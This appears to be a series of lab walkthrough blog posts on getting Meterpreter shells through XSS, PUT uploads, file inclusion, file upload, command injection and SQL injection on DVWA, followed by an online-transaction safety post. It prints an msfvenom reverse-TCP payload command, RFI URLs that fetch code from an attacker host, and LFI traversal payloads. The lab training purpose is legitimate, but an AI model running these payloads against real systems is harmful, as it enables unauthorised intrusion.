Cross Site Scripting (XSS) to Meterpreter

Hello Guys, Today we are going to learn about how we can exploit Cross Site Scripting (XSS) vulnerability and gain access over client’s system via meterpreter. Sounds weird?? Let’s have a look of it. Before proceeding, we need to learn following topics and tools.

What is Cross Site Scripting (XSS)?

Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user’s browser.

The attacker does not directly target his victim. Instead, he exploits a vulnerability in a website that the victim visits, in order to get the website to deliver the malicious JavaScript for him. To the victim’s browser, the malicious JavaScript appears to be a legitimate part of the website, and the website has thus acted as an unintentional accomplice to the attacker.

Types of XSS

While the goal of an XSS attack is always to execute malicious JavaScript in the victim’s browser, there are few fundamentally different ways of achieving that goal. XSS attacks are often divided into three types:

Stored XSS: The most damaging type of XSS is Stored (Persistent) XSS. Stored XSS attacks involves an attacker injecting a script (referred to as the payload) that is permanently stored (persisted) on the target application (for instance within a database). The classic example of stored XSS is a malicious script inserted by an attacker in a comment field on a blog or in a forum post.

When a victim navigates to the affected web page in a browser, the XSS payload will be served as part of the web page (just like a legitimate comment would). This means that victims will inadvertently end-up executing the malicious script once the page is viewed in a browser.

We will be exploiting Stored or persistent XSS for this demo but other two types can be exploited as well.

Reflected XSS: In Reflected XSS, the attacker’s payload script has to be part of the request which is sent to the web server and reflected back in such a way that the HTTP response includes the payload from the HTTP request. Using Phishing emails and other social engineering techniques, the attacker lures the victim to inadvertently make a request to the server which contains the XSS payload and ends-up executing the script that gets reflected and executed inside the browser. Since Reflected XSS isn’t a persistent attack, the attacker needs to deliver the payload to each victim – social networks are often conveniently used for the dissemination of Reflected XSS attacks.

DOM-based XSS: DOM-based XSS is an advanced type of XSS attack which is made possible when the web application’s client side scripts write user provided data to the Document Object Model (DOM). The data is subsequently read from the DOM by the web application and outputted to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.

Lab Setup:

  • Victim IP: 192.168.0.103
  • Victim OS: Windows XP
  • Victim Browser: Internet Explorer 6.0
  • Vulnerable Web App: Damn Vulnerable Web Application (DVWA)
  • Attacker IP: 192.168.0.104
  • Attacker OS: BackBox 4.7 [BeEf and Metasploit installed]

Tools:

BeEF: Beef is the short form of Browser Exploitation Framework. This is the core of our exploit. BeEF can be used to “safely” exploit Web and browser-based vulnerabilities like cross-site scripting (XSS) using client-side attack vectors. If a user clicks on a link that BeEf put there, it will hook the user’s browser into the BeEF server. Then by using different module within BeEF we can perform various malicious activities like phising, stealing password, detecting browser components, make victim’s browser to download any malicious file etc.

Metasploit: Don’t know really how to describe metasploit, many security researchers, pen testers, many blogs, sites are there to make you understand what is metasploit and what are the functionality of metasploit. So I don’t want to describe metasploit within this small paragraph. In one words, without metasploit its very tough job as penetration tester. It is basically a exploitation framework but we can use metasploit for exploit development, Anti Virus evasion, Malicious file generator and many more. You should know metasploit very well if you want to be in cyber security field.

Damn Vulnerable Web Application (DVWA): This Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. In our demo we use “Stored XSS” segment.

Scenario:

  • Attacker found a site that is having stored cross site scripting vulnerability.
  • Attacker configures BeEF in his system and generate a link that will hook victims browser whenever the link will be clicked.
  • Attacker injects the malicious javascript with that hookable link from BeEF into the site.
  • When victim opens the vulnerable page, the injected link will be triggered and victim’s browser will be hooked by BeEF.
  • Attacker chooses any browser dependent vulnerability within metasploit where a link will be generated and should be clicked by the user for successful exploitation.
  • Via BeEF module, Attacker will create an invisible iFrame with metasploit generated link and execute that within victim’s hooked browser wintout victim’s interaction.
  • if all things go right, we will have access of victim’s system.

NOTE: if you found it complicated then don’t worry. Follow the following steps.

Steps

  • DVWA has been installed within 192.168.0.103 machine. From attacker machine it can be accessed via browser. If you installed DVWA for the first time, Default user and password is admin:password.
dvwa

Fig: DVWA Login Page

  • BeEF has been already installed within BackBox . It resides within the following menu list.
beef_menu

Fig: BackBox Menu

  • While clicking BeEF, it has been started with command line.
beef_startup_cmdline

Fig: BeEF in Command line

beef_login_screen

  • There is two options in BeEF. One is Online browser and other one is Offline Browser. Online Browser indicates those hooked browsers which are online and Offline indicates those hooked one which are not active. As our XSS payload has not been built yet so there is no browser listed over here.

beef_home

  • Now its time to inject malicious javascript with BeEF payload (hook.js). For this, attacker needs to login to dvwa and select “Stored XSS” section. In this segment there is a length issue. Message length should be 50 chars long. So attacker needs to bypass this by changing the value of character length using “Inspect Element”. The xss payload : http://192.168.0.104:3000/hook.js/script
xss_injected

Fig: Malicious Javascript Injection with BeEF Payload

  • Now we are done as an attacker. While victim open that page in internet explorer of his/her machine, victim’s hooked browser will be seen in BeEF “Online Browser”. Note that DVWA security should be “Low” at victim’s end.
browser_hooked

Fig: Victim’s Browser Hooked

  • Whenever attacker found his target in “Online Browser”, his/her next move will be trigger any exploit which is browser dependent. Browser dependent exploits are those exploits where metasploit gives an URL and attackers have to convince the victim to open the URL in victim’s browser. Instead of convincing victim to open the Malicious URL, BeEF gives option to attacker to execute the URL as iframe. There are lots of exploits available within metasploit regarding browser. Among them Attacker chooses : exploit/windows/browser/ms10_002_aurora
exploit_started

Fig: Exploit started and link is given

iframe_executed

Fig: Use Metasploit given link as iframe URL

  • There are lots of modules and submodules in BeEF. Among them “Create Invisible iframe” is the one. But my recommendation is to try different modules as well for testing. Each module has different functionalities. Try to explore them.
  • After successful execution of iframe with our metasploit generated payload, our metasploit terminal shows that attacker has penetrated into the victim’s system.
pwned_sysinfo

Fig: Meterpreter Shell

References:

Insecure PUT method to Meterpreter

Hello guys. Today I will describe another way to compromise a remote system. We are going to exploit vulnerable HTTP methods PUT to gain access over the web server. Before starting we need to understand following topics.

HTTP Methods:

HTTP defines a set of request methods to indicate the desired action to be performed for a given resource. Although they can also be nouns, these request methods are sometimes referred to as HTTP verbs. Each of them implements a different semantic, but some common features are shared by a group of them: e.g. a request method can be safe, idempotent, or cacheable.

GET

The GET method requests a representation of the specified resource. Requests using GET should only retrieve data. The following example makes use of GET method to fetch hello.htm

GET /hello.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.anywebsitecanbehere.com
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

The server response against the above GET request will be as follows:

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT
ETag: "34aa387-d-1568eb00"
Vary: Authorization,Accept
Accept-Ranges: bytes
Content-Length: 88
Content-Type: text/html
Connection: Closed
<html>
<body>
<h1>Hello, World!</h1>
</body>
</html>

HEAD

The HEAD method asks for a response identical to that of a GET request, but without the response body. The following example makes use of HEAD method to fetch header information about hello.htm:

HEAD /hello.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.anywebsitecanbehere.com
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

The server response against the above GET request will be as follows:

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT
ETag: "34aa387-d-1568eb00"
Vary: Authorization,Accept
Accept-Ranges: bytes
Content-Length: 88
Content-Type: text/html
Connection: Closed

You can notice that here server the does not send any data after header.

POST

The POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server. The following example makes use of POST method to send a form data to the server, which will be processed by a process.cgi and finally a response will be returned:

POST /cgi-bin/process.cgi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.anywebsitecanbehere.com
Content-Type: text/xml; charset=utf-8
Content-Length: 88
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
<?xml version="1.0" encoding="utf-8"?>
<string xmlns="http://clearforest.com/">string</string>

The server side script process.cgi processes the passed data and sends the following response:

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT
ETag: "34aa387-d-1568eb00"
Vary: Authorization,Accept
Accept-Ranges: bytes
Content-Length: 88
Content-Type: text/html
Connection: Closed
<html>
<body>
<h1>Request Processed Successfully</h1>
</body>
</html>

PUT

The PUT method replaces all current representations of the target resource with the request payload. The following example requests the server to save the given entity-boy in hello.htm at the root of the server:

PUT /hello.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.anywebsitecanbehere.com
Accept-Language: en-us
Connection: Keep-Alive
Content-type: text/html
Content-Length: 182
<html>
<body>
<h1>Hello, World!</h1>
</body>
</html>

The server will store the given entity-body in hello.htm file and will send the following response back to the client:

HTTP/1.1 201 Created
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Content-type: text/html
Content-length: 30
Connection: Closed
<html>
<body>
<h1>The file was created.</h1>
</body>
</html>

DELETE

The DELETE method deletes the specified resource. The following example requests the server to delete the given file hello.htm at the root of the server:

DELETE /hello.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.anywebsitecanbehere.com
Accept-Language: en-us
Connection: Keep-Alive

The server will delete the mentioned file hello.htm and will send the following response back to the client:

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Content-type: text/html
Content-length: 30
Connection: Closed
<html>
<body>
<h1>URL deleted.</h1>
</body>
</html>

CONNECT

The CONNECT method establishes a tunnel to the server identified by the target resource. The following example requests a connection with a web server running on the host anywebsitecanbehere.com:

CONNECT www.anywebsitecanbehere.com HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

The connection is established with the server and the following response is sent back to the client:

HTTP/1.1 200 Connection established
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)

OPTIONS

The OPTIONS method is used to describe the communication options for the target resource. The client can specify a URL for the OPTIONS method, or an asterisk (*) to refer to the entire server. The following example requests a list of methods supported by a web server:

OPTIONS * HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

The server will send an information based on the current configuration of the server, for example:

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Type: httpd/unix-directory

TRACE

The TRACE method performs a message loop-back test along the path to the target resource. The following example shows the usage of TRACE method:

TRACE / HTTP/1.1
Host: www.anywebsitecanbehere.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

The server will send the following message in response to the above request:

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Connection: close
Content-Type: message/http
Content-Length: 39

TRACE / HTTP/1.1
Host: www.anywebsitecanbehere.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

 

 

PUT method in Depth – Let’s focus on PUT methods. The PUT method requests that the enclosed entity be stored under the supplied Request-URI. If the Request-URI refers to an already existing resource, the enclosed entity SHOULD be considered as a modified version of the one residing on the origin server. If the Request-URI does not point to an existing resource, and that URI is capable of being defined as a new resource by the requesting user agent, the origin server can create the resource with that URI. If a new resource is created, the origin server MUST inform the user agent via the 201 (Created) response. If an existing resource is modified, either the 200 (OK) or 204 (No Content) response codes SHOULD be sent to indicate successful completion of the request. If the resource could not be created or modified with the Request-URI, an appropriate error response SHOULD be given that reflects the nature of the problem. The recipient of the entity MUST NOT ignore any Content-* (e.g. Content-Range) headers that it does not understand or implement and MUST return a 501 (Not Implemented) response in such cases.

Let’s exploit it.

Tools Required:

  1. Metasploit
  2. Msfvenom
  3. Burp Suite Free Edition: Burp Suite is an integrated platform for attacking web applications. It contains a variety of tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All of the tools share the same framework for handling and displaying HTTP messages, persistence, authentication, proxies, logging, alerting and extensibility.
  4. Nikto : Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
  5. Metasploitable Linux:The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.

Lab Setup:

Steps:

dav

FIG 1 – Directory Listing is here

  • Its time to test the web server with Nikto.
nikto_PUT

FIG 2 – Nikto found insecure PUT method

  • Now we need to setup Burp as a web proxy so that we can view/intercept traffic between webserver and browser. After setting up we can view/intercept web traffic.
GET

FIG 3 – Request and Response captured by Burp while accessing /dav

  • At the beginning we need to check whether PUT method can upload the file or not. That’s why we will upload a test file to the server end. For that, We have to change GET method to PUT as well as add a text file after “/dav” . We can write the content of the file at the end of the request itself. After execution the web server will reply with 201 (CREATED) as response that means the file has been written successfully at the server end.
TEST_PUT

FIG 4 – test.txt file created by PUT method

test_browser

FIG 5 – Accessing test.txt file via browser

test_content

FIG 6 – test.txt file content

  • As we see, We can upload file(s) by using PUT method so we need a web shell to upload. Now MSFVENOM comes into the picture. By using MSFVENOM we can create a webshell.
shell_file_create

FIG 7 – Web Shell Creation using msfvenom

  • php contains php codes that are written by msfvenom.
shell_file_content

FIG 8 – Web Shell Content

  • Now we are going to write this shell.php to the web server. This step is very similar to step where we uploaded the test.txt file.
shell_uploaded

FIG 9 – Web Shell uploaded via PUT

  • As our shell.php has been uploaded successfully, we need to create the multi handler listener in metasploit so that whenever shell.php will be clicked, it will pass the control to the metasploit and meterpreter session will be openned.
handler_on

FIG 10 – Setting up multi handler for listening incoming connection

  • We are all set now. We just clicked the shell.php
shell.php_clicked

FIG 11 – shell.php just clicked and the page is loading

  • In the backed, a meterpreter session has been opened.
pwned

FIG 12 – Got the Meterpreter. System Pwned!!!

 

References:

File Inclusion to Meterpreter

What is File Inclusion vulnerability?

File inclusion vulnerability is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic Directory Traversal Attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file include vulnerability will result in remote code execution on the web server that runs the affected web application.

Types: 

Remote File Inclusion

Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

Local File Inclusion

Local File Inclusion (LFI) is similar to Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server’s access logs.

Attacker System:

OS: Backbox 4.7

IP: 192.168.0.104

Tools: Metasploit, msfvenom, tamper data, apache and php

Victim System:

OS: Win XP SP2

IP: 192.168.0.100

Tools: XAMPP, Damn Vulnerable Web Application (DVWA) [Security Level – low]

 

Exploitation of Remote File Inclusion (RFI)

Goal: By using RFI we need to inject Meterpreter within the web server.

Vulnerability Checking:

Since RFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example: 

$incfile = $_REQUEST[“file”];

include($incfile.”.php”);

In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a white list), so this snippet of code results vulnerable to this type of attack. Consider in fact the following URL:

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

In this case the remote file is going to be included and any code contained in it is going to be run by the server.

 

In our example, let’s check the vulnerable point.

dvwa

To test the RFI, I just changed the file include.php to https://www.google.com . If the given site pops up within the page then it’s an indication of RFI.

rfi_test

By seeing the response, It is confirmed that the web application has Remote File Inclusion vulnerability in it.

 

Exploitation Scenario:

As we found

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

here

“vulnerable_host/vuln_page.php?file=” is  our “192.168.0.100/dvwa/vulnerabilities/fi/?page=”

We need only our own web server from where a malicious page will be called. We can use free web hosting site or else our own server. I created my own web server by apache. By default apache comes with Backbox 4.7

screenshot-saturday-04-march-2017-022353-ist

After starting apache server we need to create and paste malicious php file within our server. Then our file location will be: http://192.168.0.104/malicious.php

So now to exploit RFI we have to browse:

http://192.168.0.100/dvwa/vulnerabilities/fi/?page=http://192.168.0.104/malicious.php

Step:

  1. Lets make a malicious php file with msfvenom by using following command:

msfvenom –p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 –f raw >> malicious.php

mal_php_gen

malicious.php is in root now.

mal_php_location

  1. We have to put this file in our own web server. For my use and demonstration apache has been used and its folder is /var/www/html

To access the file over http we need to put malicious.php in this directory.

mal_php_finallocation

  1. Now its time to set listener in Metasploit. So that connection from malicious.php can be received by the listener and successful session will be created.

listener_rfi

  1. We are all set now. We just need to access this file in following manner in attacker’s browser.

http://192.168.0.100/dvwa/vulnerabilities/fi/?page=http://192.168.0.104/malicious.php

 rfi_pwned

Whenever this url has been hit, a remote session will be created in meterpreter as the image shows.

 

Exploitation of Local File Inclusion (LFI)

Goal: By using LFI we need to establish meterpreter connection with the web server.

Vulnerability Checking:

Since LFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.

Consider the following example:

http://vulnerable_host/preview.php?file=example.html

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:

http://vulnerable_host/preview.php?file=../../../../etc/passwd  [Linux Example]

http://vulnerable_host/preview.php?file=..\..\..\..\windows\win.ini [Windows Example]

If the above mentioned conditions are met, an attacker would see something like the following:

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

alex:x:500:500:alex:/home/alex:/bin/bash

margo:x:501:501::/home/margo:/bin/bash

Very often, even when such vulnerability exists, its exploitation is a bit more complex. Consider the following piece of code:

<?php “include/”.include($_GET[‘filename’].“.php”); ?>

In the case, simple substitution with arbitrary filename would not work as the postfix ‘php’ is appended. In order to bypass it, a technique with null-byte terminators is used. Since %00 effectively presents the end of the string, any characters after this special byte will be ignored. Thus, the following request will also return an attacker list of basic users attributes:

 http://vulnerable_host/preview.php?file=../../../../etc/passwd%00

Now let’s check our target for LFI.

lfi_test

We can read the content of win.ini file at the top of the web page. That indicates LFI.

Step:

  1. Check the cookies. I use tamper data for this.

cookie

  1. Lets take a look of liffy.py

liffy_help

  1. Use liffy to exploit LFI.

screenshot-saturday-04-march-2017-125442-ist

At the end it will ask you to open Metasploit listener manually.

liffy_last

  1. Let’s create Metasploit listener.

listener_rfi

  1. After setting listener we have to press “ {ENTER} “ in the liffy terminal.

lfi_pwned

  1. After that a successful meterpreter session will be created.

 

References:

  1. https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion
  2. https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
  3. https://github.com/hvqzao/liffy
  4. https://github.com/rapid7/metasploit-framework
  5. https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
  6. https://addons.mozilla.org/En-us/firefox/addon/tamper-data/
  7. https://httpd.apache.org/download.cgi
  8. https://backbox.org/
  9. http://www.dvwa.co.uk/
  10. https://www.apachefriends.org/download.html

File upload vulnerability to Meterpreter

Vulnerability Name: Arbitrary file upload vulnerability in DVWA frame work in “low” section.

System Specification:

Victim – Windows XP SP2 [IP: 192.168.24.131]

Attacker – Kali Linux 2.0 [IP: 192.168.24.133 PORT: 4444]

Success Criteria: Following two conditions are mandatory for exploiting file upload vulnerability –

  1. Attacker can upload any file (including .php, .asp, .aspx etc)
  2. Attacker can access uploaded file.

Tools used:

  1. Metasploit
  2. Msfvenom

Prerequisite Knowledge:

  1. What is web shell and how it works? [Please google it]
  2. Metasploit listener payload [exploit/multi/handler]

Step:

  1. Generate a web shell using msfvenom. msfvenom comes with metasploit framework.

1

The given command will generate an Raw script that will be named “prasenjitkantipaul.php” and when this php will be triggered it will sent back the connection to the attacker IP (i.e: 192.168.24.133 in 4444 port)

  1. Location of malicious php

2

  1. Set DVWA security to “LOW” for this exploitation PoC.

3

  1. File Upload option

4

  1. File uploaded successfully without checking its file type.

5

  1. Set listener in attacker’s side to grab the connection what will be sent from victim.

6

  1. Accessing the file

7

  1. Let’s see, after trying to access our malicious shell what is happening to our listener.

8

We successfully compromise victim’s machine using our php web shell.

 

OS Command Injection to Meterpreter

Definition: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

DEMO:

Victim Machine: Here victim is a server (WinXP SP2), hosting DVWA where OS Command Injection is there in “LOW” Security.

OS: Win XP SP2

IP: 192.168.0.102

Web APP: Damn Vulnerable Web Application (DVWA)

1

Attacker Machine:

IP: 192.168.0.104

OS: BackBox 4.7

Browser: Mozilla Firefox

Tool: Commix ([comm] and [i]njection e[x]ploiter)Tamper Data (Mozilla Add-ons)

 

Steps:

  1. First of all we need to find the Injection Point and Cookie for DVWA Command Injection. Tamper Data has been used for this purpose.

2

  1. After finding Cookie and Injection point, We have to run commix from terminal.

3

  1. After successful injection by commix it will ask for pseudo shell and we will choose that to interact with the victim.

4

  1. Before proceed further, we need to create python based reverse tcp listener in metasploit.

5

  1. Let’s continue with commix’s option. We have to select python based reverse shell at the end and provide LHOST and LPORT.

6

  1. After selecting Python based Meterpreter payload a reverse tcp connection will be made with our metasploit listener.

7

References:

  1. https://www.owasp.org/index.php/Command_Injection
  2. http://www.dvwa.co.uk/
  3. https://github.com/commixproject/commix
  4. https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  5. https://backbox.org
  6. https://portswigger.net/KnowledgeBase/issues/Details/00100100_OScommandinjection

 

SQL Injection to Meterpreter

Goal: By exploiting SQL Injection vulnerability fully compromise the victim server and get reverse shell (Meterpreter) using SQLMap.

Victim System: Damn Vulnerable Web App (DVWA) is installed in Windows XP for creating such virtual lab. IP: 192.168.24.131

Attacker System: Kali Linux 2.0 [Python 2.7, SQLMap and Metasploit installed by default]. IP: 192.168.24.129

Tools:

SQLMap: sqlmap is a python based open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. For any quires: http://sqlmap.org/

Meterpreter: Meterpreter is a payload (shell) of Metasploit. After successful exploitation Meterpreter shell will give you command line access to victims system. Using Meterpreter you can do whatever you want to do. For any quires: https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

Process:

1

FIG 1: Login to DVWA for SQLi [admin:password]

2

FIG 2: Set Security Update as “Low”

3

FIG 3: Setting Burp Proxy to analyze the response

4

FIG 4: Random check by using value “1”

5

FIG 5: Putting a Single Quote in GET parameter “ID” causing an DB error

6

FIG 6: Analyze the response and find the session cookie

7

FIG 7: SQLMap command to exploit SQLi and get the DB

8

FIG 8: Got the DBs | SQLi Proved

9

FIG 9: SQLMap Command to gain system level access

10

FIG 10: Some options that we have to choose

11

FIG 11: Successfully injecting payload to victim’s server

12

FIG 12: Bingoooo!!!! We pwned the system with Meterpreter

How to Secure Online Transactions?

Introduction: Nowadays we have shifted our life into digital form. Today we have moved from hand written letter to e-mail/chat , TV to IP-TV, coins to bitcoins, messaging to whatsapp etc. So it is obvious that we now do online shopping instead of going to market. This actually saves our time but there is high probability to compromise/hack our personal information by malicious hackers. So how to protect ourself is a million dollar question. Let’s search for it.

Make sure there is ‘https://‘:

The web address starts with the prefix HTTPS. The “S” is important because it means that an encryption protocol called Secure Sockets Layer (SSL) is being used to connect to a web server. The prefix HTTP (without the “S”) means that encryption isn’t being used, and the transaction is less secure.

A lock icon appears on the right side of the Address bar. Click the lock icon to view the certificate used to encrypt the webpage. The certificate identifies the certification authority that issued it, the dates that it’s valid, and the server you’re communicating with. If something looks wrong in the information, contact the issuer to confirm the certificate’s validity.

https

Use Private Browsing:

Consider always conducting financial transactions in a private browsing session so your browsing history, passwords, and other private data will not be saved or accessible to anyone who uses the computer after you. Make sure to log out of the website and close all browser windows when you are finished. If possible, do not conduct any financial transactions from a public or shared computer or over a public wireless Internet connection.

private browsing

Do not “Remember Password“:

When you are giving your credentials to a site your browser will ask for “Remember Password” option. if you click “Remember”, your password will be automatically saved in your browser. Any one can open your account by this saved credentials. So do not save your password in browser.

firefox-remember-never-for-this-site-not-now

Strong Password Recommended:

Password must be 16+ characters. Combination of both upper-case and lower-case, digits and special symbol. It must not be any dictionary word. You can use pass-phrase rather than password.

stanford-password-policy1-640x604

Use Updated Anti Virus Solutions:

It is possible to get your every key stoke remotely by a key logging software. Malicious hackers are doing this thing. So to protect your self use any Anti Virus with daily update and scan your system weekly.

best-mac-antivirus-12

Avoid Phising:

Phising is a technique to gather victim password by providing fake web pages that almost same to the real one. Malicious hackers are doing this by email. So be very careful when you read any mail or click any link given in a mail.

phising

Use ‘Two Step Verification’:

Use two step verification if this option is there. In two step verification, if you put your correct password, an One Time Password (OTP) will be sent to your contact number. It is much more secure.

google-two-step-verification1

Do not Use Public WiFi/Open WiFi for Online Transactions:

It is possible to get your credentials by malicious hackers if you are in public/open WiFi. So do not use these networks for online transactions.

NEW YORK, NY - JULY 11: A free Wi-Fi hotspot beams broadband internet from atop a public phone booth on July 11, 2012 in Manhattan, New York City. New York City launched a pilot program Wednesday to provide free public Wi-Fi at public phone booths around the five boroughs. The first ten booths were lit up with Wi-Fi routers attached to the top of existing phone booths, with six booths in Manhattan, two in Brooklyn, and one in Queens. Additional locations, including ones in the Bronx and Staten Island, are to be added soon. (Photo by John Moore/Getty Images)

Use Your Personal System for Online Transactions:

Do not use others laptop for online transaction. It is possible may be his/her laptop has been compromised already. It is very risky to use cyber cafe’s system for online transactions.

Follow The Rules:

If you are reading this that means you are looking for a way that will secure your online transaction. So don’t be a reader only. Please follow those instructions in your daily digital life. Be the change.